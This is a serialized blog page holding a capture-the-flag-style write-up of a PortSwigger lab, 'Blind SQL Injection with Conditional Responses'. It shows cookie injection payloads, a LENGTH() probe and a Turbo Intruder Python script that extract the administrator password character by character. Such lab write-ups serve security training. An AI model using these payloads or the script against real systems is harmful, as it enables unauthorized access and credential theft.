[{"data":1,"prerenderedAt":666},["ShallowReactive",2],{"search":3,"recent-machines":40,"machine-\u002Fmachines\u002Fps-blind-sqli-conditional-responses":49},[4,8,12,16,20,24,28,32,36],{"_path":5,"title":6,"image":7},"\u002Fmachines\u002Fhtb-boardlight","BoardLight","\u002Fimg\u002Fmachines\u002Fhtb-boardlight\u002Fcover.png",{"_path":9,"title":10,"image":11},"\u002Fmachines\u002Fhtb-headless","Headless","\u002Fimg\u002Fmachines\u002Fhtb-headless\u002Fcover.png",{"_path":13,"title":14,"image":15},"\u002Fmachines\u002Fhtb-usage","Usage","\u002Fimg\u002Fmachines\u002Fhtb-usage\u002Fcover.png",{"_path":17,"title":18,"image":19},"\u002Fmachines\u002Fps-blind-sqli-conditional-errors","Blind SQL Injection with Conditional Errors","\u002Fimg\u002Fmachines\u002Fps-blind-sqli-conditional-errors\u002Fcover.jpg",{"_path":21,"title":22,"image":23},"\u002Fmachines\u002Fps-blind-sqli-conditional-responses","Blind SQL Injection with Conditional Responses","\u002Fimg\u002Fmachines\u002Fps-blind-sqli-conditional-responses\u002Fcover.jpg",{"_path":25,"title":26,"image":27},"\u002Fmachines\u002Fthm-containment","ContAInment","\u002Fimg\u002Fmachines\u002Fthm-containment\u002Fcover.png",{"_path":29,"title":30,"image":31},"\u002Fprojects\u002Fejpt-certification","eJPT — Junior Penetration Tester","\u002Fimg\u002Fprojects\u002Fejpt\u002Fcover.svg",{"_path":33,"title":34,"image":35},"\u002Fprojects\u002Fmaddox","Maddox","\u002Fimg\u002Fprojects\u002Fmaddox\u002Fcover.png",{"_path":37,"title":38,"image":39},"\u002Fprojects\u002Fsentinel","Sentinel Password Manager","\u002Fimg\u002Fprojects\u002Fsentinel\u002Fcover.png",[41,43,44,46,48],{"_path":17,"title":18,"difficulty":42},"Practitioner",{"_path":21,"title":22,"difficulty":42},{"_path":25,"title":26,"difficulty":45},"Medium",{"_path":13,"title":14,"difficulty":47},"Easy",{"_path":9,"title":10,"difficulty":47},{"_path":21,"_dir":50,"_draft":51,"_partial":51,"_locale":52,"title":22,"description":53,"difficulty":42,"platform":54,"os":55,"date":56,"image":23,"tags":57,"body":60,"_type":660,"_id":661,"_source":662,"_file":663,"_stem":664,"_extension":665},"machines",false,"","Practitioner-level PortSwigger lab exploiting boolean-based blind SQL injection via the TrackingId cookie to extract the administrator password character by character","PortSwigger","Web","2026-08-29",[54,55,42,58,59],"SQLi","Blind SQLi",{"type":61,"children":62,"toc":653},"root",[63,72,95,100,138,166,172,199,207,246,256,264,293,303,309,322,336,381,393,399,429,442,456,461,593,605,611,637,647],{"type":64,"tag":65,"props":66,"children":68},"element","h2",{"id":67},"scenario-analysis",[69],{"type":70,"value":71},"text","Scenario Analysis",{"type":64,"tag":73,"props":74,"children":75},"p",{},[76,78,85,87,93],{"type":70,"value":77},"The vulnerable parameter here is ",{"type":64,"tag":79,"props":80,"children":82},"code",{"className":81},[],[83],{"type":70,"value":84},"TrackingId",{"type":70,"value":86},", which sits inside the ",{"type":64,"tag":79,"props":88,"children":90},{"className":89},[],[91],{"type":70,"value":92},"Cookie",{"type":70,"value":94}," header. The server uses it directly in a SQL query behind the scenes.",{"type":64,"tag":73,"props":96,"children":97},{},[98],{"type":70,"value":99},"I quickly noticed that:",{"type":64,"tag":101,"props":102,"children":103},"ul",{},[104,126],{"type":64,"tag":105,"props":106,"children":107},"li",{},[108,110,116,118,124],{"type":70,"value":109},"When the injected condition is ",{"type":64,"tag":111,"props":112,"children":113},"strong",{},[114],{"type":70,"value":115},"true",{"type":70,"value":117}," (returns at least 1 row), the page includes the text ",{"type":64,"tag":79,"props":119,"children":121},{"className":120},[],[122],{"type":70,"value":123},"Welcome back",{"type":70,"value":125},".",{"type":64,"tag":105,"props":127,"children":128},{},[129,131,136],{"type":70,"value":130},"When it's ",{"type":64,"tag":111,"props":132,"children":133},{},[134],{"type":70,"value":135},"false",{"type":70,"value":137}," (0 rows), that text disappears.",{"type":64,"tag":73,"props":139,"children":140},{},[141,143,149,151,157,159,165],{"type":70,"value":142},"That difference is all I need to exfiltrate data one character at a time. The goal: extract the ",{"type":64,"tag":79,"props":144,"children":146},{"className":145},[],[147],{"type":70,"value":148},"administrator",{"type":70,"value":150}," password from the ",{"type":64,"tag":79,"props":152,"children":154},{"className":153},[],[155],{"type":70,"value":156},"users",{"type":70,"value":158}," table and log in at ",{"type":64,"tag":79,"props":160,"children":162},{"className":161},[],[163],{"type":70,"value":164},"\u002Flogin",{"type":70,"value":125},{"type":64,"tag":65,"props":167,"children":169},{"id":168},"confirming-the-vulnerability",[170],{"type":70,"value":171},"Confirming the Vulnerability",{"type":64,"tag":73,"props":173,"children":174},{},[175,177,183,185,190,192,197],{"type":70,"value":176},"I intercepted a request to ",{"type":64,"tag":79,"props":178,"children":180},{"className":179},[],[181],{"type":70,"value":182},"\u002F",{"type":70,"value":184}," and sent it to ",{"type":64,"tag":111,"props":186,"children":187},{},[188],{"type":70,"value":189},"Repeater",{"type":70,"value":191},". Then I modified the ",{"type":64,"tag":79,"props":193,"children":195},{"className":194},[],[196],{"type":70,"value":84},{"type":70,"value":198}," to run a basic boolean test:",{"type":64,"tag":73,"props":200,"children":201},{},[202],{"type":64,"tag":111,"props":203,"children":204},{},[205],{"type":70,"value":206},"True condition:",{"type":64,"tag":208,"props":209,"children":213},"pre",{"className":210,"code":211,"language":212,"meta":52,"style":52},"language-http shiki shiki-themes github-dark","GET \u002F HTTP\u002F2\nHost: YOUR-LAB-ID.web-security-academy.net\nCookie: TrackingId=ORIGINAL_ID' AND '1'='1; session=YOUR_SESSION\n","http",[214],{"type":64,"tag":79,"props":215,"children":216},{"__ignoreMap":52},[217,228,237],{"type":64,"tag":218,"props":219,"children":222},"span",{"class":220,"line":221},"line",1,[223],{"type":64,"tag":218,"props":224,"children":225},{},[226],{"type":70,"value":227},"GET \u002F HTTP\u002F2\n",{"type":64,"tag":218,"props":229,"children":231},{"class":220,"line":230},2,[232],{"type":64,"tag":218,"props":233,"children":234},{},[235],{"type":70,"value":236},"Host: YOUR-LAB-ID.web-security-academy.net\n",{"type":64,"tag":218,"props":238,"children":240},{"class":220,"line":239},3,[241],{"type":64,"tag":218,"props":242,"children":243},{},[244],{"type":70,"value":245},"Cookie: TrackingId=ORIGINAL_ID' AND '1'='1; session=YOUR_SESSION\n",{"type":64,"tag":73,"props":247,"children":248},{},[249,254],{"type":64,"tag":79,"props":250,"children":252},{"className":251},[],[253],{"type":70,"value":123},{"type":70,"value":255}," is present — the condition was evaluated as true.",{"type":64,"tag":73,"props":257,"children":258},{},[259],{"type":64,"tag":111,"props":260,"children":261},{},[262],{"type":70,"value":263},"False condition:",{"type":64,"tag":208,"props":265,"children":267},{"className":210,"code":266,"language":212,"meta":52,"style":52},"GET \u002F HTTP\u002F2\nHost: YOUR-LAB-ID.web-security-academy.net\nCookie: TrackingId=ORIGINAL_ID' AND '1'='2; session=YOUR_SESSION\n",[268],{"type":64,"tag":79,"props":269,"children":270},{"__ignoreMap":52},[271,278,285],{"type":64,"tag":218,"props":272,"children":273},{"class":220,"line":221},[274],{"type":64,"tag":218,"props":275,"children":276},{},[277],{"type":70,"value":227},{"type":64,"tag":218,"props":279,"children":280},{"class":220,"line":230},[281],{"type":64,"tag":218,"props":282,"children":283},{},[284],{"type":70,"value":236},{"type":64,"tag":218,"props":286,"children":287},{"class":220,"line":239},[288],{"type":64,"tag":218,"props":289,"children":290},{},[291],{"type":70,"value":292},"Cookie: TrackingId=ORIGINAL_ID' AND '1'='2; session=YOUR_SESSION\n",{"type":64,"tag":73,"props":294,"children":295},{},[296,301],{"type":64,"tag":79,"props":297,"children":299},{"className":298},[],[300],{"type":70,"value":123},{"type":70,"value":302}," disappears. Blind SQL injection confirmed.",{"type":64,"tag":65,"props":304,"children":306},{"id":305},"determining-password-length",[307],{"type":70,"value":308},"Determining Password Length",{"type":64,"tag":73,"props":310,"children":311},{},[312,314,320],{"type":70,"value":313},"Before brute-forcing the characters, I needed to know how long the password is. I injected a ",{"type":64,"tag":79,"props":315,"children":317},{"className":316},[],[318],{"type":70,"value":319},"LENGTH()",{"type":70,"value":321}," check:",{"type":64,"tag":208,"props":323,"children":325},{"className":210,"code":324,"language":212,"meta":52,"style":52},"Cookie: TrackingId=ORIGINAL_ID' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)=1)='a; session=YOUR_SESSION\n",[326],{"type":64,"tag":79,"props":327,"children":328},{"__ignoreMap":52},[329],{"type":64,"tag":218,"props":330,"children":331},{"class":220,"line":221},[332],{"type":64,"tag":218,"props":333,"children":334},{},[335],{"type":70,"value":324},{"type":64,"tag":73,"props":337,"children":338},{},[339,341,347,349,355,356,362,364,369,371,380],{"type":70,"value":340},"I incremented the value manually — ",{"type":64,"tag":79,"props":342,"children":344},{"className":343},[],[345],{"type":70,"value":346},"=1",{"type":70,"value":348},", ",{"type":64,"tag":79,"props":350,"children":352},{"className":351},[],[353],{"type":70,"value":354},"=2",{"type":70,"value":348},{"type":64,"tag":79,"props":357,"children":359},{"className":358},[],[360],{"type":70,"value":361},"=3",{"type":70,"value":363},"... until ",{"type":64,"tag":79,"props":365,"children":367},{"className":366},[],[368],{"type":70,"value":123},{"type":70,"value":370}," reappeared. It came back at ",{"type":64,"tag":111,"props":372,"children":373},{},[374],{"type":64,"tag":79,"props":375,"children":377},{"className":376},[],[378],{"type":70,"value":379},"20",{"type":70,"value":125},{"type":64,"tag":73,"props":382,"children":383},{},[384,386,391],{"type":70,"value":385},"The password is exactly ",{"type":64,"tag":111,"props":387,"children":388},{},[389],{"type":70,"value":390},"20 characters",{"type":70,"value":392}," long.",{"type":64,"tag":65,"props":394,"children":396},{"id":395},"extracting-the-password-with-turbo-intruder",[397],{"type":70,"value":398},"Extracting the Password with Turbo Intruder",{"type":64,"tag":73,"props":400,"children":401},{},[402,404,408,410,415,417,422,423,428],{"type":70,"value":403},"With the length confirmed, I moved on to character extraction. I opened Turbo Intruder from ",{"type":64,"tag":111,"props":405,"children":406},{},[407],{"type":70,"value":189},{"type":70,"value":409}," — right-click → ",{"type":64,"tag":111,"props":411,"children":412},{},[413],{"type":70,"value":414},"Extensions",{"type":70,"value":416}," → ",{"type":64,"tag":111,"props":418,"children":419},{},[420],{"type":70,"value":421},"Turbo Intruder",{"type":70,"value":416},{"type":64,"tag":111,"props":424,"children":425},{},[426],{"type":70,"value":427},"Send to Turbo Intruder",{"type":70,"value":125},{"type":64,"tag":73,"props":430,"children":431},{},[432,434,440],{"type":70,"value":433},"In the upper window, I set up the HTTP template with ",{"type":64,"tag":79,"props":435,"children":437},{"className":436},[],[438],{"type":70,"value":439},"%s",{"type":70,"value":441}," placeholders for the position and the character to test:",{"type":64,"tag":208,"props":443,"children":445},{"className":210,"code":444,"language":212,"meta":52,"style":52},"Cookie: TrackingId=ORIGINAL_ID' AND SUBSTRING((SELECT password FROM users WHERE username='administrator'), %s, 1) = '%s; session=YOUR_SESSION\n",[446],{"type":64,"tag":79,"props":447,"children":448},{"__ignoreMap":52},[449],{"type":64,"tag":218,"props":450,"children":451},{"class":220,"line":221},[452],{"type":64,"tag":218,"props":453,"children":454},{},[455],{"type":70,"value":444},{"type":64,"tag":73,"props":457,"children":458},{},[459],{"type":70,"value":460},"Then in the lower window, I pasted the automation script:",{"type":64,"tag":208,"props":462,"children":466},{"className":463,"code":464,"language":465,"meta":52,"style":52},"language-python shiki shiki-themes github-dark","def queueRequests(target, wordlists):\n    engine = RequestEngine(endpoint=target.endpoint,\n                           concurrentConnections=5,\n                           requestsPerConnection=100,\n                           pipeline=False)\n\n    chars = 'abcdefghijklmnopqrstuvwxyz0123456789'\n    for pos in range(1, 21):\n        for char in chars:\n            engine.queue(target.req, [str(pos), char])\n\ndef handleResponse(req, interesting):\n    if 'Welcome back' in req.response:\n        table.add(req)\n","python",[467],{"type":64,"tag":79,"props":468,"children":469},{"__ignoreMap":52},[470,478,486,494,503,512,522,531,540,549,558,566,575,584],{"type":64,"tag":218,"props":471,"children":472},{"class":220,"line":221},[473],{"type":64,"tag":218,"props":474,"children":475},{},[476],{"type":70,"value":477},"def queueRequests(target, wordlists):\n",{"type":64,"tag":218,"props":479,"children":480},{"class":220,"line":230},[481],{"type":64,"tag":218,"props":482,"children":483},{},[484],{"type":70,"value":485},"    engine = RequestEngine(endpoint=target.endpoint,\n",{"type":64,"tag":218,"props":487,"children":488},{"class":220,"line":239},[489],{"type":64,"tag":218,"props":490,"children":491},{},[492],{"type":70,"value":493},"                           concurrentConnections=5,\n",{"type":64,"tag":218,"props":495,"children":497},{"class":220,"line":496},4,[498],{"type":64,"tag":218,"props":499,"children":500},{},[501],{"type":70,"value":502},"                           requestsPerConnection=100,\n",{"type":64,"tag":218,"props":504,"children":506},{"class":220,"line":505},5,[507],{"type":64,"tag":218,"props":508,"children":509},{},[510],{"type":70,"value":511},"                           pipeline=False)\n",{"type":64,"tag":218,"props":513,"children":515},{"class":220,"line":514},6,[516],{"type":64,"tag":218,"props":517,"children":519},{"emptyLinePlaceholder":518},true,[520],{"type":70,"value":521},"\n",{"type":64,"tag":218,"props":523,"children":525},{"class":220,"line":524},7,[526],{"type":64,"tag":218,"props":527,"children":528},{},[529],{"type":70,"value":530},"    chars = 'abcdefghijklmnopqrstuvwxyz0123456789'\n",{"type":64,"tag":218,"props":532,"children":534},{"class":220,"line":533},8,[535],{"type":64,"tag":218,"props":536,"children":537},{},[538],{"type":70,"value":539},"    for pos in range(1, 21):\n",{"type":64,"tag":218,"props":541,"children":543},{"class":220,"line":542},9,[544],{"type":64,"tag":218,"props":545,"children":546},{},[547],{"type":70,"value":548},"        for char in chars:\n",{"type":64,"tag":218,"props":550,"children":552},{"class":220,"line":551},10,[553],{"type":64,"tag":218,"props":554,"children":555},{},[556],{"type":70,"value":557},"            engine.queue(target.req, [str(pos), char])\n",{"type":64,"tag":218,"props":559,"children":561},{"class":220,"line":560},11,[562],{"type":64,"tag":218,"props":563,"children":564},{"emptyLinePlaceholder":518},[565],{"type":70,"value":521},{"type":64,"tag":218,"props":567,"children":569},{"class":220,"line":568},12,[570],{"type":64,"tag":218,"props":571,"children":572},{},[573],{"type":70,"value":574},"def handleResponse(req, interesting):\n",{"type":64,"tag":218,"props":576,"children":578},{"class":220,"line":577},13,[579],{"type":64,"tag":218,"props":580,"children":581},{},[582],{"type":70,"value":583},"    if 'Welcome back' in req.response:\n",{"type":64,"tag":218,"props":585,"children":587},{"class":220,"line":586},14,[588],{"type":64,"tag":218,"props":589,"children":590},{},[591],{"type":70,"value":592},"        table.add(req)\n",{"type":64,"tag":73,"props":594,"children":595},{},[596,598,603],{"type":70,"value":597},"I hit ",{"type":64,"tag":111,"props":599,"children":600},{},[601],{"type":70,"value":602},"Launch attack",{"type":70,"value":604}," and within seconds the results table showed exactly 20 hits — one correct character per position.",{"type":64,"tag":65,"props":606,"children":608},{"id":607},"authentication",[609],{"type":70,"value":610},"Authentication",{"type":64,"tag":73,"props":612,"children":613},{},[614,616,621,623,628,630,635],{"type":70,"value":615},"I put the 20 characters together in order, navigated to ",{"type":64,"tag":111,"props":617,"children":618},{},[619],{"type":70,"value":620},"My account",{"type":70,"value":622}," (",{"type":64,"tag":79,"props":624,"children":626},{"className":625},[],[627],{"type":70,"value":164},{"type":70,"value":629},"), logged in as ",{"type":64,"tag":79,"props":631,"children":633},{"className":632},[],[634],{"type":70,"value":148},{"type":70,"value":636}," with the extracted password, and the lab was solved.",{"type":64,"tag":73,"props":638,"children":639},{},[640,645],{"type":64,"tag":111,"props":641,"children":642},{},[643],{"type":70,"value":644},"Lab solved!",{"type":70,"value":646}," 🏴",{"type":64,"tag":648,"props":649,"children":650},"style",{},[651],{"type":70,"value":652},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":52,"searchDepth":230,"depth":230,"links":654},[655,656,657,658,659],{"id":67,"depth":230,"text":71},{"id":168,"depth":230,"text":171},{"id":305,"depth":230,"text":308},{"id":395,"depth":230,"text":398},{"id":607,"depth":230,"text":610},"markdown","content:machines:ps-blind-sqli-conditional-responses.md","content","machines\u002Fps-blind-sqli-conditional-responses.md","machines\u002Fps-blind-sqli-conditional-responses","md",1788033908243]